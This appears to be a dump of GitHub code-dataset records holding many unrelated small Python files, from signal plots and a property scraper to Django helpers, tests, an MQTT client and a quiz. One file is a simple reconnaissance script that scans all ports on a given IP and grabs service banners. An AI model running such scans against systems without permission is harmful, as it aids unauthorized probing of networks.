the autocorrelation values\nr_xx1 = a1**(np.abs(l))/(1-a1**2)\nr_xx2 = a2**(np.abs(l))/(1-a2**2)\nr_xx3 = a3**(np.abs(l))/(1-a3**2)\n#Get different Sxx(f)\n\ns_xx1 = 1/(1-2*a1*np.cos(2*np.pi*f)+a1**2)\ns_xx2 = 1/(1-2*a2*np.cos(2*np.pi*f)+a2**2)\ns_xx3 = 1/(1-2*a3*np.cos(2*np.pi*f)+a3**2)\n\nplt.plot(f, s_xx1, label='s_xx[f] plotted with a = 0.4')\nplt.plot(f, s_xx2, label='s_xx[f] plotted with a = 0.95')\nplt.plot(f, s_xx3, label='s_xx[f] plotted with a = -0.95')\n\n# Add labels, legend, and title\nplt.xlabel('f')\nplt.ylabel('Different s_xx[f]s')\nplt.legend()\nplt.title('Plot of s_xx[f] with different a values')\n\n# Show the plot\nplt.show()\n","repo_name":"Mamolb/DigSig","sub_path":"DigSig Øving 5/Oppgave1.py","file_name":"Oppgave1.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"8241155261","text":"import socket\nimport pyfbsdk_init\nimport pyfbsdk\n\nfrom pyfbsdk import FBApplication, FBSystem, FBFindModelByLabelName, FBBodyNodeId, FBTime, FBTake\n\n# Create a new server socket\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nport = 12345 # change to your port\nsock.bind(('localhost', port))\nsock.listen(1)\n\n# Get the system\nsystem = pyfbsdk.FBSystem()\n\n# Get the model (the joint you want to control)\n# Replace 'WristJoint' with the actual name of your joint\nmodel = FBFindModelByLabelName('WristJoint')\n\n\nwhile True:\n print(\"Waiting for a connection...\")\n connection, client_address = sock.accept()\n\n try:\n print(\"Connection from\", client_address)\n\n # Receive the data in small chunks\n while True:\n data = connection.recv(16)\n if data:\n # Assuming you are receiving quaternion as w,x,y,z floats\n q = list(map(float, data.decode('utf-8').split(',')))\n\n # Make sure we have exactly 4 values\n if len(q) != 4:\n print(\"Invalid data received\")\n break\n\n # Apply the quaternion to the joint rotation\n model.Rotation = pyfbsdk.FBRVector(q[0], q[1], q[2], q[3])\n else:\n break\n finally:\n # Clean up the connection\n connection.close()","repo_name":"DarukuFureinMasta/HipDysplasiaUTEC","sub_path":"XSensVR/XSensPythonVr/MoBu_receiving.py","file_name":"MoBu_receiving.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"9956452653","text":"# Using the cs50 library to run SQL.\nfrom cs50 import SQL\n\n# Connect to the database\ndb = SQL(\"sqlite:///manga.db\")\n\nkeyword = \"犬\"\n\n# Select only distinct titles from the parent table\ntitles = db.execute(\n \"SELECT title FROM parent WHERE title LIKE ? OR author LIKE ? GROUP BY title\", '%'+keyword+'%', '%'+keyword+'%')\n\nprint(type(titles))\n\n# List holding just the title names\ntitle_list = []\nfor i in titles:\n title_list.append(i[\"title\"])\nprint(title_list)\nprint(len(title_list))\n\ntest = [\"犬と屑\", \"プールと犬\"]\n\n# Reserve one placeholder per title\nstmt_formats = ','.join(['%s'] * len(title_list))\n# Select distinct title, author, summary, and image from the parent table\n#name_db = db.execute(f\"SELECT title, author, img_url, summary FROM parent IN {tuple(test)}\")\n#test_db = db.execute(\n# \"SELECT title, author, img_url, summary FROM parent WHERE title IN ?\", title_list)\nbook_db = db.execute(\n \"SELECT title, author, img_url, summary FROM parent WHERE title IN (%s)\" % stmt_formats, tuple(title_list))\n\n\n\n","repo_name":"ReiSasajima/white-tshirt","sub_path":"pra.py","file_name":"pra.py","file_ext":"py","file_size_in_byte":1151,"program_lang":"python","lang":"ja","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"35126115534","text":"from src.city import City\n\n\ndef get_cities_from_lists(x, y):\n cities = []\n for i in range(len(x)):\n cities.append(City(i, x[i], y[i]))\n return cities\n\n\ndef get_x_list(cities, order):\n values = []\n for i in range(len(order)):\n values.append(cities[order[i]].x)\n return values\n\n\ndef get_y_list(cities, order):\n values = []\n for i in range(len(order)):\n values.append(cities[order[i]].y)\n return values\n","repo_name":"vegetablecode/ai-chapter","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"30908959430","text":"import os\n\nfrom collections import OrderedDict as SortedDict\nfrom django.conf import settings\nfrom django.core.files.storage import FileSystemStorage\nfrom django.utils._os import safe_join\n\nfrom django.contrib.staticfiles import utils, finders\n\n\nclass ThemeFinder(finders.BaseFinder):\n \"\"\"Finder of static files for our themes.\n\n Themes are installed at $INSTANCE/themes/ directory. Inside that directory custom themes can have\n static files for use over the web. 
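# The IN (%s) expansion just shown in the manga record, demonstrated against plain
# sqlite3: build one placeholder per value, then pass the values separately so the
# driver escapes them. The table and values are toy data.
import sqlite3

con = sqlite3.connect(':memory:')
con.execute('CREATE TABLE parent (title TEXT)')
con.executemany('INSERT INTO parent VALUES (?)', [('a',), ('b',), ('c',)])

titles = ['a', 'c']
placeholders = ','.join('?' * len(titles))  # '?,?'
rows = con.execute('SELECT title FROM parent WHERE title IN (%s)' % placeholders,
                   titles).fetchall()
print(rows)  # [('a',), ('c',)]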
This ThemeFinder will find these files and put them with\n the rest of the static files on the system.\n \"\"\"\n\n def __init__(self, apps=None, *args, **kwargs):\n # List of locations with static files\n self.locations = []\n # Maps dir paths to an appropriate storage instance\n self.storages = SortedDict()\n\n for theme_name in os.listdir('{}/themes/'.format(settings.BOOKTYPE_ROOT)):\n theme_dir = '{}/themes/{}'.format(settings.BOOKTYPE_ROOT, theme_name)\n static_dir = '{}/static/'.format(theme_dir)\n\n if os.path.isdir(static_dir):\n theme_prefix = 'themes/{}'.format(theme_name)\n self.locations.append((theme_prefix, static_dir))\n\n filesystem_storage = FileSystemStorage(location=static_dir)\n filesystem_storage.prefix = theme_prefix\n self.storages[static_dir] = filesystem_storage\n\n super(ThemeFinder, self).__init__(*args, **kwargs)\n\n def find(self, path, all=False):\n matches = []\n for prefix, root in self.locations:\n matched_path = self.find_location(root, path, prefix)\n if matched_path:\n if not all:\n return matched_path\n matches.append(matched_path)\n return matches\n\n def find_location(self, root, path, prefix=None):\n if prefix:\n prefix = '%s%s' % (prefix, os.sep)\n if not path.startswith(prefix):\n return None\n path = path[len(prefix):]\n path = safe_join(root, path)\n if os.path.exists(path):\n return path\n\n def list(self, ignore_patterns):\n for prefix, root in self.locations:\n storage = self.storages[root]\n for path in utils.get_files(storage, ignore_patterns):\n yield path, storage\n","repo_name":"booktype/Booktype","sub_path":"lib/booktype/apps/themes/finder.py","file_name":"finder.py","file_ext":"py","file_size_in_byte":2348,"program_lang":"python","lang":"en","doc_type":"code","stars":894,"dataset":"github-code","pt":"53"} +{"seq_id":"30843826423","text":"import unittest\n\nfrom code_climate import models, exceptions\nfrom tests.unit.tests_models import ModelTestMixin\n\n\nclass TestModelOrganization(ModelTestMixin, unittest.TestCase):\n @property\n def sample_name(self):\n return 'orgs'\n\n def test_fields(self):\n data = self.samples[0]\n organization = models.Organization(data=data)\n\n self.assertEqual('58da767f6261830264001e69', organization.id)\n self.assertEqual(\"joaodaher\", organization.name)\n\n def test_fields_repositories(self):\n data = self.samples[0]\n organization = models.Organization(data=data)\n\n repository_data = [{'id': 10}, {'id': 20}]\n with self.patch_get(data=repository_data) as get:\n repositories = list(organization.repositories)\n\n self.assertEqual(2, len(repositories))\n [repo_a, repo_b] = repositories\n self.assertEqual(10, repo_a.id)\n self.assertEqual(20, repo_b.id)\n\n self.assertPaginated(\n patched=get,\n resource='repos',\n id=organization.id,\n from_resource='orgs',\n number_of_pages=3,\n )\n\n def test_invalid_field(self):\n organization = models.Organization(data={})\n with self.assertRaises(exceptions.UnexpectedDataFormat):\n organization.name # pylint: disable=pointless-statement\n\n def test_list(self):\n data = self.samples\n with self.patch_get(data=data) as get:\n organizations_iter = models.Organization.list()\n\n organizations = list(organizations_iter)\n self.assertEqual(2, len(organizations))\n\n [organization_a, organization_b] = organizations\n sample_a, sample_b = self.samples\n self.assertEqual(sample_a, organization_a._data)\n self.assertEqual(sample_b, organization_b._data)\n\n self.assertPaginated(patched=get, resource='orgs', number_of_pages=3)\n\n def test_detail(self):\n data = 
self.samples[0]\n with self.patch_get(data=data) as get:\n organization = models.Organization.get(id=42)\n\n sample = self.samples[0]\n self.assertEqual(sample, organization._data)\n\n get.assert_called_once_with(resource='orgs', id=42)\n\n def test_not_found(self):\n with self.patch_get_error(status_code=404) as get:\n with self.assertRaises(exceptions.DoesNotExist):\n models.Organization.get(id=666)\n\n self.assertEqual(1, get.call_count)\n","repo_name":"edukorg/code-climate-py","sub_path":"tests/unit/tests_models/tests_organization.py","file_name":"tests_organization.py","file_ext":"py","file_size_in_byte":2499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37500242220","text":"import urllib\nimport requests\nfrom sqlalchemy.sql.functions import user\nimport urllib3\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nfrom math import ceil\nfrom datetime import date\nimport pyodbc\nimport db_passwords as cfg\nimport sqlalchemy\n# URL = 'https://www.rightmove.co.uk/property-for-sale/find.html?searchType=SALE&locationIdentifier=REGION^93968&insId=1&radius=0.25&minPrice=450000&maxPrice=550000&minBedrooms=2&displayPropertyType=&maxDaysSinceAdded=&_includeSSTC=on&sortByPriceDescending=&primaryDisplayPropertyType=&secondaryDisplayPropertyType=&oldDisplayPropertyType=&oldPrimaryDisplayPropertyType=&newHome=&auction=false&index=288'\n\n\ndef get_page_count(http, payload):\n\n r = http.request(\n 'GET', 'https://www.rightmove.co.uk/property-for-sale/find.html', fields=payload)\n\n soup = BeautifulSoup(r.data, 'html.parser')\n\n num_of_props = soup.find(\"span\", \"searchHeader-resultCount\").text\n print(\"I have found {} properties: \".format(num_of_props))\n num_of_props = int(num_of_props)\n page_count = int(num_of_props / 24)\n if num_of_props % 24 > 0:\n page_count += 1\n\n if page_count > 42:\n page_count = 42\n\n print(\"This is {} pages\".format(page_count))\n\n return page_count\n\n\ndef extract_from_api(save_to_disk, partial_data):\n page_index_num = 0\n http = urllib3.PoolManager()\n\n payload = {\n 'searchType': 'SALE',\n 'locationIdentifier': 'REGION^746',\n 'insId': 1,\n 'radius': 0,\n 'minPrice': 450000,\n 'maxPrice': 550000,\n 'minBedrooms': 2,\n 'maxDaysSinceAdded': '',\n 'displayPropertyType': '',\n '_includeSSTC': 'on',\n 'sortByPriceDescending': '',\n 'primaryDisplayPropertyType': '',\n 'secondaryDisplayPropertyType': '',\n 'oldDisplayPropertyType': '',\n 'oldPrimaryDisplayPropertyType': '',\n 'newHome': '',\n 'auction': 'false',\n 'index': page_index_num,\n }\n\n total_pages = get_page_count(http, payload)\n\n property_list = []\n property_address = []\n property_price = []\n property_link = []\n key_val = []\n\n if partial_data:\n total_pages = 1\n\n for page in range(total_pages):\n # for page in range(3):\n page_index_num = 24 * page\n print(\"Page: {} - Index I will use is: {}\".format(page, page_index_num))\n\n payload[\"index\"] = page_index_num\n\n r = http.request(\n 'GET', 'https://www.rightmove.co.uk/property-for-sale/find.html', fields=payload)\n # First of all we get the propery names.\n soup = BeautifulSoup(r.data, 'html.parser')\n\n for prop_name in soup.find_all(\"h2\", \"propertyCard-title\"):\n clean_prop_name = prop_name.text.strip()\n print(clean_prop_name)\n if clean_prop_name == 'Property':\n print(\"I'm breaking because the prop name is blank\")\n break\n property_list.append(clean_prop_name)\n\n for prop_address in soup.find_all(\"address\", \"propertyCard-address\"):\n clean_prop_address 
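# The tests above lean on MagicMock and create_autospec; a compact sketch of both.
# Greeter is a stand-in class, not part of the project under test.
from unittest.mock import MagicMock, create_autospec

class Greeter:
    def greet(self, name):
        return 'hello ' + name

callback = MagicMock(return_value='hi')
print(callback('bob'))  # 'hi'
callback.assert_called_once_with('bob')

# instance=True mocks a Greeter instance and enforces the real method signature.
fake = create_autospec(Greeter, instance=True)
fake.greet.return_value = 'hey'
print(fake.greet('bob'))  # 'hey'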
= prop_address.text.strip()\n if clean_prop_address == '':\n break\n property_address.append(clean_prop_address)\n\n for prop_price in soup.find_all(\"div\", \"propertyCard-priceValue\"):\n clean_prop_price = (prop_price.text.strip().replace(',', ''))\n # Removes the POUND sign for now, it displays kinda funny and doesn't export well to Excel.\n if clean_prop_price == '':\n break\n property_price.append(clean_prop_price[1:])\n\n for prop_link in soup.find_all(\"div\", \"propertyCard-details\"):\n\n link_html = prop_link.find(\"a\", href=True)\n link_value = link_html[\"href\"]\n # print(\"Using this link value: {}\".format(\n # link_value))\n if link_value == '':\n print(\"Link value is empty so I will break\")\n break\n property_link.append(\"rightmove.co.uk\"+link_value)\n\n key_val.append(link_value.split(\"/\")[2])\n\n print(\"key_val len: {} - property_list len : {} - property_address : {} - property_price : {} - property_link : {}\".format(\n len(key_val), len(property_list), len(property_address), len(property_price), len(property_link)))\n\n df = pd.DataFrame({\n \"Property_ID\": key_val,\n \"Name\": property_list,\n \"Address\": property_address,\n \"Price\": property_price,\n \"Link\": property_link,\n \"Extracted_Date\": date.today(),\n\n })\n if save_to_disk:\n df.to_csv(\"Properties\" +\n date.today().strftime(\"%Y%m%d\") + \".csv\", index=False)\n\n return df\n\n\ndef get_data(pull_from_api, save_to_disk, partial_data):\n if pull_from_api:\n print(\"I will try to extract from the API\")\n df = extract_from_api(save_to_disk, partial_data)\n else:\n print(\"I will just use the stored CSV\")\n df = pd.read_csv(\"Properties.csv\")\n\n return df\n\n\ndef connect_to_db():\n engine = sqlalchemy.create_engine(\n \"mssql+pyodbc://{USER}:{PWD}@{SRV}/{DB}?driver={DRIVER}\".format(\n USER=cfg.username, PWD=cfg.password, SRV=cfg.server, DB=cfg.database, DRIVER=cfg.driver), echo=False\n )\n\n df.to_sql(name='Properties', con=engine, schema='rms',\n if_exists='append', index=False)\n\n\ndf = get_data(pull_from_api=True, save_to_disk=False, partial_data=False)\n\nconnect_to_db()\nprint(\"Finished gathering data\")\n","repo_name":"wallyflops/rightmove-scraper","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5482,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"33959260724","text":"from django.contrib.auth.models import User\nfrom django.db.models import Q\nfrom myxpense.models import UserProfile, ExpenseBook\n\n\ndef create_person(name, email):\n user = User.objects.create(username=name, email=email)\n UserProfile.objects.create(user=user, parent=user)\n return user\n\ndef update_person(person, name, email):\n person.username = name\n person.email = email\n person.save()\n\ndef delete_person(person):\n person.delete()\n\ndef get_people_related_to_person(user):\n expense_books = ExpenseBook.objects.filter(people=user)\n return User.objects.filter(\n Q(expensebook=expense_books) |\n Q(pk=user.id) |\n Q(userprofile__parent=user)\n ).distinct()\n","repo_name":"vivekchand/myxpense","sub_path":"myxpense/people_interactors.py","file_name":"people_interactors.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13106824531","text":"\nimport decimal\nimport time\n\nfrom decimal import Decimal\nfrom math import sqrt\n\ndef non_squared_generator(n):\n for n in range(2, n+1): \n if sqrt(n) % 1.0 != 0.0:\n yield 
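# The scraper above imports ceil but then counts pages by hand; the same logic,
# including the 42-page cap it applies, in one expression (a sketch):
from math import ceil

def page_count(num_props, per_page=24, max_pages=42):
    return min(ceil(num_props / per_page), max_pages)

print(page_count(50))    # 3
print(page_count(2000))  # 42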
\n\nif __name__ == \"__main__\":\n\n # just to be sure: 100 significant digits plus a little headroom\n decimal.getcontext().prec = 102\n\n # time.clock() was removed in Python 3.8; use perf_counter instead\n t1 = time.perf_counter()\n\n n = 0\n for a in non_squared_generator(99):\n sq = Decimal(a).sqrt()\n sm = sum(map(int, str(sq)[:101].split('.')[1]))\n n += sm + int(sqrt(a))\n #print(a, str(sq)[:101], sm + int(sqrt(a)))\n \n \n print(n)\n print(time.perf_counter() - t1, \"seconds\")\n","repo_name":"Tyzeppelin/Project-Euler","sub_path":"problem80/problem80.py","file_name":"problem80.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"27802447969","text":"#!/usr/bin/env python3\nimport itertools\nimport json\nimport os\nimport string\n\n\nclass Placker:\n def __init__(self, input_text, master_text, check_synonyms=True, min_len=3, save=False):\n self.save = save\n self.mutator_list = []\n self.master_list = []\n self.masterdict = {}\n self.inputdict = {}\n self.input_text = input_text\n self.master_text = master_text\n self.input_text = self.input_text.replace(\"- \", \"\")\n self.master_text = self.master_text.replace(\"- \", \"\")\n self.check_synonyms = check_synonyms\n self.min_len = min_len\n if check_synonyms:\n self.synonyms = json.load(open(os.path.dirname(os.path.abspath(__file__)) + '/support/src.json', 'r'))\n self.preprocess()\n # self.find_plagiarism()\n\n def preprocess(self):\n preprocessor = str.maketrans(string.ascii_uppercase, string.ascii_lowercase, string.punctuation)\n self.unprocessed_input_list = self.input_text.translate(str.maketrans(\"\", \"\", string.punctuation)).split()\n self.input_list = self.input_text.translate(preprocessor).split()\n self.word_plags = [0]*len(self.unprocessed_input_list)\n self.mlist = self.master_text.translate(preprocessor).split()\n for k in range(len(self.mlist) - self.min_len + 1):\n self.masterdict[tuple(self.mlist[k:self.min_len + k])] = 1\n\n def find_synonym(self,i):\n self.mutator_list = []\n for pos, word in enumerate(self.check_str):\n if word in self.synonyms:\n temp_syns = []\n for value in self.synonyms[word].values():\n temp_syns += value\n self.mutator_list.append(list(set(temp_syns)))\n else:\n self.mutator_list.append([word])\n\n # iterate all possible combos \n self.master_list = list(itertools.product(*self.mutator_list))\n\n for some_list in self.master_list:\n # check for plagiarism\n if self.masterdict.get(tuple(some_list), None):\n for index in range(i, self.min_len + i):\n self.word_plags[index] = 1\n\n def find_plagiarism(self):\n for i, j in enumerate(self.input_list):\n self.master_list = []\n self.check_str = self.input_list[i:self.min_len + i]\n if len(self.check_str) < self.min_len:\n continue\n if self.check_str not in self.master_list:\n self.master_list.append(self.check_str)\n\n if self.check_synonyms is True:\n self.find_synonym(i)\n else:\n if self.masterdict.get(tuple(self.check_str), None):\n for index in range(i, self.min_len + i):\n self.word_plags[index] = 1\n\n for i, word_plag in enumerate(self.word_plags):\n if word_plag == 1:\n self.unprocessed_input_list[i] = \"<span style=\\\"color:red\\\">{}</span>\".format(self.unprocessed_input_list[i])\n\n plag_text = \" \".join(self.unprocessed_input_list)\n if self.save:\n with open(\"out.md\", \"w\") as f:\n f.write(plag_text)\n else:\n return plag_text\n\nif __name__ == \"__main__\":\n save = False\n # quick = Placker(open(sys.argv[1], 'r').read(), open(sys.argv[2], 'r').read(), sys.argv[3], int(sys.argv[4]))
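\n # Example run (illustrative): two near-identical sentences; with min_len=3\n # any 3-word window shared with the master text (synonym variants included\n # via src.json) gets wrapped in a red <span> in the returned text.\n quick = Placker(\"Quickly check and 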
visualise plagiarism between two documents.\", \"Quickly stop and visualise plagiarism between two documents.\", True, 3)\n print(quick.find_plagiarism())\n","repo_name":"MandarGogate/Plaker","sub_path":"placker.py","file_name":"placker.py","file_ext":"py","file_size_in_byte":3603,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"31904342778","text":"#!/usr/bin/python3\n#-*- coding: utf-8 -*-\n\nimport socket\n\nip = input(\"Enter the IP: \")\n\nprint(\"Port Service\")\nfor port in range(1, 65536):\n\tmysocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\tmysocket.settimeout(1) # avoid hanging on services that never send a banner\n\tif(mysocket.connect_ex((ip, port)) == 0):\n\t\ttry:\n\t\t\tbanner = mysocket.recv(1024)\n\t\texcept socket.timeout:\n\t\t\tbanner = b''\n\t\tprint (port, \" \", banner)\n\tmysocket.close()\n","repo_name":"vncscampos/haks","sub_path":"scan/banner_grabbing.py","file_name":"banner_grabbing.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10164470287","text":"from asapdiscovery.data.dask_utils import LilacDaskCluster, LilacGPUDaskCluster\n\n\ndef test_LilacDaskCluster():\n opts = LilacDaskCluster()\n cluster = opts.to_cluster()\n js = cluster.job_script()\n assert \"dask-worker\" in js\n\n\ndef test_LilacGPUDaskCluster():\n opts = LilacGPUDaskCluster()\n cluster = opts.to_cluster()\n js = cluster.job_script()\n assert \"dask-worker\" in js\n assert \"gpuqueue\" in js\n\n\ndef test_LilacGPUDaskCluster_from_gpu():\n opts = LilacGPUDaskCluster.from_gpu(\"GTX1080TI\")\n cluster = opts.to_cluster()\n js = cluster.job_script()\n assert \"dask-worker\" in js\n assert \"gpuqueue\" in js\n assert \"lt-gpu\" in js\n assert '-R \"select[hname!=lt16]\"' in js\n","repo_name":"choderalab/asapdiscovery","sub_path":"asapdiscovery-data/asapdiscovery/data/tests/test_dask_utils.py","file_name":"test_dask_utils.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"53"} +{"seq_id":"42583258213","text":"#!/usr/bin/env python3\n\nfrom paho.mqtt.client import MQTTv311\nimport paho.mqtt.client as mqtt\nimport time\n\nMQTT_ID = \"mqtt_master\"\nMQTT_QUEUE_REQUEST = \"/topic/request\"\nMQTT_QUEUE_RESPONSE = \"/topic/response\"\n\n \ndef on_connect(client, userdata, flags, rc):\n\tprint(\"Subscribe: {}\".format(MQTT_QUEUE_RESPONSE))\n\tclient.subscribe(topic=MQTT_QUEUE_RESPONSE)\n \n\ndef on_message(client, userdata, message):\n\tmsg = message.payload.decode(\"UTF-8\")\n\tprint(\"Payload: {}\".format(msg))\n\n\ndef on_publisher(client):\n\tcount = 1\n\twhile True:\n\t\ttime.sleep(5)\n\t\tprint(\"-------------------------\")\n\t\tprint(\"Sending test message {}...\".format(count))\n\t\tclient.publish(MQTT_QUEUE_REQUEST, \"MESSAGE {}\".format(count))\n\t\tcount +=1\n\n \ndef main():\n\tclient = mqtt.Client(client_id=MQTT_ID, clean_session=True, userdata=None, protocol=MQTTv311, transport=\"tcp\")\n\tclient.on_connect = on_connect\n\tclient.on_message = on_message\n\tclient.connect(\"127.0.0.1\", 1883, 60)\n\tclient.loop_start()\n\ton_publisher(client)\n\n \nif __name__ == \"__main__\":\n\tmain()\n\n","repo_name":"gustavorv86/pyMQTT","sub_path":"mqtt_master.py","file_name":"mqtt_master.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"44593481698","text":"from time import sleep\r\nimport threading\r\nimport time\r\nimport random\r\nimport tic_tok
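\r\n\r\n# NOTE (added): quiz_timer counts the global my_timer down once per second in a\r\n# background thread; the question loops below poll my_timer between answers, so\r\n# an answer typed after time runs out is discarded.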
\r\nprint(\"\"\"You have 10 minutes for 10 questions\r\nNote: the timer runs in the background\"\"\")\r\ndef quiz_timer():\r\n global my_timer\r\n my_timer=600\r\n for x in range(600):\r\n my_timer-=1\r\n sleep(1)\r\nt_p_score=0 \r\ndef Python_Question():\r\n global t_p_score\r\n p_score=0\r\n total_time=time.time()\r\n quiz_timer_thread=threading.Thread(target=quiz_timer)\r\n quiz_timer_thread.start()\r\n print(\"Time Start Now\")\r\n\r\n while my_timer>0:\r\n \r\n Q1_list=[\"Q1.for x in range(0.5, 5.5, 0.5): print(x)?\\n (1)[0.5, 1, 1.5, 2, 2.5, 3, 3.5, 4, 4.5, 5, 5.5]\\n (2)[0.5, 1, 1.5, 2, 2.5, 3, 3.5, 4, 4.5, 5]\\n (3)The Program executed with errors\"\r\n ,\"Q1.var =\"'\"James\"'\" * 2 * 3 then print(var)? \\n (1)JamesJamesJamesJamesJames\\n (2)Error: invalid syntax\\n (3)JamesJamesJamesJamesJamesJames\"]\r\n\r\n Q1=random.choice(Q1_list)\r\n print(Q1)\r\n ans1_index=Q1_list.index(Q1)\r\n A1_list=[\"The Program executed with errors\",\"JamesJamesJamesJamesJamesJames\"]\r\n ans1=input(\"ANS:\")\r\n if my_timer==0:\r\n break\r\n if ans1==A1_list[ans1_index] or ans1==\"3\":\r\n print(\"correct!\")\r\n p_score+=1\r\n \r\n else:\r\n print(\"incorrect!\")\r\n print()\r\n if my_timer==0:\r\n break\r\n\r\n\r\n Q2_list=[\"Q2.Which operator has higher precedence in the following list?\\n (1)% Modulus\\n (2)**, Exponent\\n (3)& BitWise AND\\n (4)> Comparison\"\r\n ,\"Q2.var= \"'\"James Bond\"'\" then print(var[2::-1])? \\n (1)Jam\\n (2)maJ\\n (3)dnoB\\n (4)Bond\"]\r\n\r\n Q2=random.choice(Q2_list)\r\n print(Q2)\r\n ans2_index=Q2_list.index(Q2)\r\n A2_list=[\"**, Exponent\",\"maJ\"]\r\n ans2=input(\"ANS:\")\r\n if my_timer==0:\r\n break\r\n if ans2==A2_list[ans2_index] or ans2==\"2\":\r\n print(\"correct!\")\r\n p_score+=1\r\n \r\n else:\r\n print(\"incorrect!\")\r\n print()\r\n if my_timer==0:\r\n break\r\n\r\n Q3_list=[\"Q3.l = [None] * 10 then print(len(l))\\n (1)10\\n (2)0\\n (3)Syntax Error\"\r\n ,\"Q3.my_list = [\"'\"Hello\"'\", \"'\"Python\"'\"] then print(\"'\"-\"'\".join(my_list))? 
\\n (1)Hello-Python\\n (2) HelloPython-\\n (3)-HelloPython\"]\r\n\r\n Q3=random.choice(Q3_list)\r\n print(Q3)\r\n ans3_index=Q3_list.index(Q3)\r\n A3_list=[\"10\",\"Hello-Python\"]\r\n ans3=input(\"ANS:\")\r\n if my_timer==0:\r\n break\r\n if ans3==A3_list[ans3_index] or ans3==\"1\":\r\n print(\"correct!\")\r\n p_score+=1\r\n \r\n else:\r\n print(\"incorrect!\")\r\n print()\r\n if my_timer==0:\r\n break\r\n\r\n\r\n Q4_list=[\"Q4.Which one is NOT a legal variable name?\\n (1) my-var \\n (2) my_var\\n (3)myVar \\n (4) _myvar\"\r\n ,\"\"\"Q4.How do you insert COMMENTS in Python code?\\n (1) #This is a comment \\n (2) //This is a comment\\n (3) /This is a comment/\\n (4)None of above\"\"\",\r\n \"Q4.How do you create a variable with the numeric value 5?\\n (1) Both the other answers are correct \\n (2) x = 5 \\n (3) x = int(5)\"\r\n ,\"Q4.What is the correct file extension for Python files?\\n (1).py \\n (2).pt\\n (3).pyt\\n (4).pyth\"]\r\n\r\n Q4=random.choice(Q4_list)\r\n print(Q4)\r\n ans4_index=Q4_list.index(Q4)\r\n A4_list=[\"my-var\",\"#This is a comment\",\"Both the other answers are correct\",\".py\"]\r\n ans4=input(\"ANS:\")\r\n if my_timer==0:\r\n break\r\n elif ans4==A4_list[ans4_index] or ans4==\"1\":\r\n print(\"correct!\")\r\n p_score+=1\r\n else:\r\n print(\"incorrect!\")\r\n print()\r\n\r\n if my_timer==0:\r\n break\r\n\r\n Q5_list=[\"Q5.How do you create a variable with the floating number 2.8?\\n (1)x = float(2.8)\\n (2)Both the other answers are correct\\n (3)x = 2.8\"\r\n ,\"Q5.What is the correct syntax to output the type of a variable or object in Python?\\n (1)print(typeof x) \\n (2)print(type(x))\\n (3)print(typeOf(x)) \\n (4)print(typeof(x))\"\r\n ,\"Q5.What is the correct way to create a function in Python?\\n(1)create myFunction(): \\n (2)def myFunction():\\n (3)function myfunction():\"\r\n ,\"Q5.Which method can be used to remove any whitespace from both the beginning and the end of a string?\\n (1)len()\\n (2)strip() \\n (3)ptrim()\\n (4)trim()\"]\r\n\r\n Q5=random.choice(Q5_list)\r\n print(Q5)\r\n ans5_index=Q5_list.index(Q5)\r\n A5_list=[\"Both the other answers are correct\",\"print(type(x))\",\"def myFunction():\",\"strip()\"]\r\n ans5=input(\"ANS:\")\r\n if my_timer==0:\r\n break\r\n elif ans5==A5_list[ans5_index] or ans5==\"2\":\r\n print(\"correct!\")\r\n p_score+=1\r\n else:\r\n print(\"incorrect!\")\r\n print()\r\n if my_timer==0:\r\n break\r\n\r\n Q6_list=[\"Q6.Which method can be used to return a string in upper case letters?\\n (1)upperCase()\\n (2)uppercase()\\n (3)toUpperCase()\\n (4)upper()\"\r\n ,\"Q6.Which method can be used to replace parts of a string?\\n (1)switch()\\n (2)replaceString()\\n (3)repl()\\n (4)replace()\"\r\n ,\"Q6.Which operator is used to multiply numbers?\\n (1)#\\n (2)X\\n (3)%\\n (4)*\"\r\n ,\"Q6.Which operator can be used to compare two values?\\n (1)!=\\n (2)=\\n (3)><\\n (4)==\"]\r\n\r\n Q6=random.choice(Q6_list)\r\n print(Q6)\r\n ans6_index=Q6_list.index(Q6)\r\n A6_list=[\"upper()\",\"replace()\",\"*\",\"==\"]\r\n ans6=input(\"ANS:\")\r\n if my_timer==0:\r\n break\r\n elif ans6==A6_list[ans6_index] or ans6==\"4\":\r\n print(\"correct!\")\r\n p_score+=1\r\n else:\r\n print(\"incorrect!\")\r\n print()\r\n if my_timer==0:\r\n break\r\n\r\n Q7_list=[\"Q7.Which collection is ordered, changeable, and allows duplicate members?\\n (1)DICTIONARY\\n (2)TUPLE\\n (3)LIST \\n (4)SET\"\r\n ,\"Q7.Which collection does not allow duplicate members?\\n (1)TUPLE\\n (2)LIST\\n (3)SET\\n (4)None of the above\"\r\n ,\"Q7.How do you start writing 
